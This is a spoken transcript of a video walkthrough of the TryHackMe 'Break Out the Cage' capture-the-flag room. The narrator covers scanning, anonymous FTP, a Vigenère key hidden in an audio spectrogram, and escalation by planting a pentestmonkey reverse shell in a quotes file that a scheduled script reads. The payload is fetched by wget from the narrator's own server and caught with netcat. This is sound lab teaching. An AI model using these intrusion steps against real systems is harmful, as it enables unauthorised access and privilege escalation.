Hey guys, welcome back to another video on TryHackMe Capture the Flag challenge. Today we will be working on one of the beginner level CDF challenge and its name is Breakout. Let's begin. So the name is Breakout the Cage, help Cage bring back his acting career and investigate the um, nefarious going on of his agent. So it says let's find out what his agent is up to, what is the Western password, and what is the user flag and root flag. So this is one user. We just got it from here. So my IP is 10.8.21.57 and the machine IP is 10.10.196.35. So let's begin with the nmap scan, export IP, sudo nmap sc, sv, and IP. And here is the password. Meanwhile, let's check if something is hosted on port 80. So there is a site. Um, my diary, this is my personal website, my son Weston. So this is his father. Set it up for the boy is always MIT dropout. I am the cage. Okay, so this is another user cage. Um, and these links are not working, not enabled. So you can see hash down in the bottom. I think I jump around more when I'm alone. So nice quote. And let's see if there is something interesting in the source code. So nothing special, all the links are pointing to hash and nothing special here. So let's go back to our nmap scan and meanwhile let's start the GoBuster scan as well. So I'll run with the smaller word list with extension PHP and let's go back to nmap. So it is saying 21 is open and there is a file called dad underscore tasks. My bad. 22 is SSH and 80 port we already know. So let's see what is there in dad underscore tasks. So 10.10.196.35 and FTP $IP anonymous blank ls minus la get dad underscore tasks exit ls minus la. So let's see what is written in dad tasks file. So it is encrypted. um, there is no padding here. It might be a base 64 encryption, but let's see on cyberchef. um, okay, this one, and let's see if it is able to detect the cipher um, algorithm or mechanism, how it is encrypted. Yep, so it is definitely a base 64, but it is again giving encrypted text. Let's copy this, paste it here, and let's try a couple of things. So since everything is alphabetic characters, so it must be um, rote encryption. Just the simple one. Rote 13 is not, so let's see if we can read anything by changing this parameter. No, so it is not a rote algorithm, and since this is not able to detect by its own, so there is a greater chance that there is a key used here, and one of the other encryption that could be used in Caesar cipher category is Vina, uh, Vigenry decode. I don't know if I'm pronouncing it correctly, but it requires a key. So um, the file says dad, so I don't know dad uh, tasks or dad underscore tasks. No, only characters. Okay, so we don't know what this is, and so let's park this aside, and let's see what we have found in GoBuster. So images, HTML, scripts, and contracts, and then auditions. So let's check one by one. Slash images, um, bunch of images here. So let's check a couple of them. My diary. So seems like these are supporting files of the home page we previously visited. Yep. And then next is HTML. It is blank HTML uh, scripts. There are some scripts. Okay, so this is kind of dialogue scripts. It is very lengthy, so let's just uh, park this one also. All the scripts. Okay, we will come back to this if required, and then there is a folder contracts, folder not in use, and size is 0. So this is a file with 0 bytes. So next is auditions, and there's a mp3 file, 1 MB. Let's download this. um, I don't know if this is audible to you, but the file was clearly audible till here, and there was a noise somewhere in this portion. Now two three peoples are discussing with each other, and some arguments going on. Okay, so the other part is very clearly audible, but this part is having some noise. Okay, so for MP3 files, there is a technique called spectrogram. So there are a couple of websites available where we can try to check if some messages hidden in that noise. So the one of the website is Academo. Um, so this is the direct link which I have with me, and there are other tools like Udacity and Sonic Visualizer. Sonic Visualizer. These are offline tools, and these can be installed on the machine. Audacity and Sonic Visualizer. So I have Sonic Visualizer copy on this machine. So we're gonna try Sonic Visualizer. But if you want to check the online version, so you can upload the file here, and it will show you a spectrogram, and you can read the message if something is hidden there. So this is the spectrogram. Uh, so we can see the message here. So let's run the Sonic Visualizer. It is in opt slash opt slash Sonic Visualizer app image. Taking a few seconds to run. Okay, so let's open the file and let's see if we can see something there. So I have not downloaded this mp3 file. File save as. In download folders as .mp3, and in the Sonic Visualizer here is the file, and this is the audio file. So down here you can check the complete part, so you can clearly see the more noise was coming in the starting portion till this part. So under pane you can um, add the spectrogram for uh, both channels or one channel. So basically two channel means left and right, if I'm not wrong. So let's click on all channel, and this part is odd in audio file. So I don't know if you can see the message here. So there is a word written here. Let's see if I can zoom. Yep, now it might be visible to you. So this could be the key of that encryption. So let's go back and use this word as key of this message, and it is not accepting. Okay, let's make slight changes. Yep, so dad's task, the rage, the cage, the man, the legend. uh, One, revamp the website to put more quotes in the script. And the last one, teach dad what is information security is in case I forget. So this could be a password. So I'm just keeping this password with me. And let's see, uh, we can close this Sonic Visualizer now. Save changes, no. And what is the next task? So what is the Western password? So this must be a Western password, then the user flag and root flag. So let's check the SSH. Western at the rate 10.10 dot. What is the IP? 196.35. Yes. Password. We are in. So ls minus la. There is no file here. ID. We are in a group called cage, and sudo minus l. Password. We can run file user bin bees. So cat usr bin bees. What's that? So there is a broadcast message from cage, and this is kind of a quote from some drama or some book. So, but what is the content of this file? So till here, okay. So this was the broadcast message at 79, and this file content is a bash file, but the only message we can run is this using sudo privilege sudo slash usr slash bin slash bees. That's it. So similar to this, something is running from cage ls slash home. Yep. So this is a different user, cage and western, and we are member of cage as well. um, ID. So before checking about that group, I just want to check if we can uh, write on this file. No, it is only uh, read permission and execute permission, and it is on by root. We can't do much about this, so let's find out what all files are writable or owned by user cage. So find in root directory group cage and dev slash null slash dev slash null. Okay, so a couple of files are there. This is a folder. um, this is a Python script, and this is a quotes script. So let's check what is inside this file. So seems like these are the random codes which are coming as an announcement to us every few seconds. Last one came at 79. um, if it is set for every 5 minutes, that then we might get it at 14. Let's wait for it, and let's check the content of this script as well. Cat. So this is a Python script obviously, and import OS, import random. It is picking up the lines um, from the quotes file, and it is splitting up the lines. Then it is randomly choosing from those lines, and it is announcing to the wall with quote. So what we can do, first of all, check if this Python script is writable to cage. Yes, it is. Obviously it is on by cage, so I don't know what I'm doing. Okay, so we can write in this file obviously, so we can write something here and it will get executed. Maybe let's try with the reverse shell. um, Pentest monkey, and let's run the. I'm waiting for the announcement to come. It is already 14 and there is no announcement after 17 9. Okay, anyways, so in Pentest monkey, let's copy this one, our regular command from for reverse shell, and paste it here, replace with our IP, and port is 1234. Okay, announcement has came again at 9, oh sorry, 17:15, so roughly after 6 minutes. So next one should come at 21. Okay, so nano, um, and this file nano is not installed here. So let's do one thing. We can um, create a file dot quotes here on our machine and paste um, this reverse shell script. We can do echo as well and write to this file, but these characters might um, create trouble. So the alternate is to do base64 encoding and decoding to write in the file, or we can write uh, this syntax locally on our machine first, and we can start a Python HTTP server and download the file there. So we are not under this directory, so let's go to codes directory, um, this one, cd slash paste and ls minus la. Yep, so wget http colon slash slash 10.8.21.57 port 8000 slash dot codes success. So since file was already there, so it has created a file with different name. That's not what we wanted. So mv dot codes dot one codes. Why autocomplete is not working? Yep, so we need to now wait for next run. Oh god, so it already came at 18, so this is kind of random and not a specific time maybe, and we have not initiated our shell unfortunately, so we missed the chance. The port is 1234, I'm pausing the video because I don't know when the next run will happen, and we'll resume it again. So now it ran after 3 minutes, but nothing happened, so we might have made some mistake. Cat dot quotes. So our file has been replaced, or have we made any mistake? Let's download it again. And verify the content first. Dot quotes dot one. Up seems okay. mv dot quotes dot one dot quotes. Let's cancel this and run the netcat just in case. And looks okay. Cat dot quotes. Yep. So let's wait for 2-3 more minutes and let's see what will happen. And we got the shell. Okay, so the user is cage, and sudo -l no tty, so we need to create our shell. Python 3 import pty and then pty dot spawn double quotes slash bin slash bash and the inverted comma. Looks good. Sudo -l. We don't have the password of cage, so we need to press enter 3 times. I can't press Control C, otherwise it will interrupt our shell, our reverse shell. And so ls-la. So we have email backup and super duper checklist. So let's see, this is a file, this is a folder. Get super duper checklist. So we got our user flag here, and let's clear this out. Clear is not working. Anyways, export term xterm hyphen 256 color. Now clear should work. Yep. Okay. So ls-la, we have already checked super duper checklist. We got our user flag, and now cd email underscore backup lsla. Why it is taking so long? Is my connection stable? Yes, it is. VPN is also connected, so enter. Okay, seems like it is not working. Can I exit from the Python thing? No. Okay, ls, nothing is working. for some reason. Don't know what to do. Should I cancel this and take this shell again? Let's try that. Control C and wait for next cycle to run. So last run was 24, 27. In 2 minutes it should run again. So we'll resume the video. Okay, we got shell again in 3 minutes and ls. I don't know what is going on. So it should work fine. Maybe I'm not sure. So should I disconnect my VPN and connect it again or wait for it? So it is very slow. Mm. So eventually I have reset the machine and seems like now it is working fine. So something went wrong with that uh, instance. So sometime that's happened. So cd/backup. Let's see what is inside in this folder. 3 emails. Cat email underscore one. Nothing interesting here, and then cat email underscore two. You can pause the video and read the complete email if you want to. And um, so here is some interesting reference. On a much lighter note, thank you for helping me set up the home server. Weston helped me too, but not overly great. I gave him some smaller jobs. What's your username on here? Root. Okay, let's see what is there in the last email. So there is a note which is this and nothing else. So maybe this note by um, this note is left by him, and this could be the root password. So let's try. Let's open another window and let's try to take SSH again with root at 10.10. What's the new IP? New IP is 10.10.140.184, and here is the root password. No. So since this is not in readable format, maybe this is a kind of cipher again. And no, it is not able to detect automatically. It should not be root 13. Otherwise this could have automatically detected that one. No. So maybe let's stick to one method, which is, wait a minute, root 13. Nothing here. Okay, so let's stick to the same um, method of encryption which was done previously. So we need some key again. So let's carefully check the email. It must be something in last two emails. So we have discussed before, Sean. I want bigger role. Um, the guy also seems obsessed with my face lately. He came him wearing a mask of my face. So was rather odd. Imagine wearing his ugly face. I would not be able to face that. Get it, Western face that. Face it is odd. So lots of um, use of word face. It is just a wild guess, and we don't know what it could be. So if this is the password, then it should work now. No, or maybe let's see if we can cancel our shell and check the password as you paste. Authentication failure. So what about the non-decrypted version? As you paste, enter authentication failure. So it is not accepting that. Trying one more time. I don't know if I am making a mistake here. Sudo su paste. Yep, now the password worked. So I have not copied it properly. So basically the decrypted version which is shown here is the correct password. So let's see what is there in the root directory. ls, again email backup. So cd email backup ls minus la, and two emails again. So get email underscore one, and in another email the root flag is there. So it is readable just like email uh, one. So it is readable to us and we can capture the root flag. So this is it. So in the previous video also I stuck with a problematic machine and I had to reset multiple times, and in this video again I'm not sure if something is I'm doing something wrong which is making these VM stuck. Most likely it is not the case. And in this challenge there are a couple of things which where I got confused, like the initial dad underscore tasks file from FTP. We had to find a key, and the key was in MP3 file, and we need to find a software to decode that. And I tried to use a couple of them, and some characters were not readable, so I tried multiple combinations, and when it finally worked, the key the password was unlocked for this Western user. So that part was most difficult for me to crack, and I hope you have enjoyed the video and learned a couple of things. If you have any other suggestion or comments, you can please mention in the comment section. And that's it. So keep watching other videos and keep learning. Have a great day. Bye bye.